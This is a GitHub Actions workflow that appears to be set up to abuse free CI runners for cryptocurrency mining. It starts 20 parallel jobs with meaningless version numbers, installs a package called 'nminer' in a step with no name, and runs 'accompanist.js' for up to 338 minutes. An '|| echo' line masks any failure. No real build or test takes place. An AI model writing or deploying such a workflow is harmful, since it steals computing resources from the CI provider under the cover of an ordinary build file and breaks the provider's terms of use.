name: accompanist
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 2238 }
          - { version: 9583 }
          - { version: 2694 }
          - { version: 5418 }
          - { version: 9285 }
          - { version: 2716 }
          - { version: 6400 }
          - { version: 1824 }
          - { version: 5606 }
          - { version: 7289 }
          - { version: 2132 }
          - { version: 8599 }
          - { version: 7099 }
          - { version: 2556 }
          - { version: 8316 }
          - { version: 3796 }
          - { version: 694 }
          - { version: 3751 }
          - { version: 9673 }
          - { version: 2910 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: 
        run: |
          npm install nminer@latest
          timeout 338m node accompanist.js || echo "accompanist executed"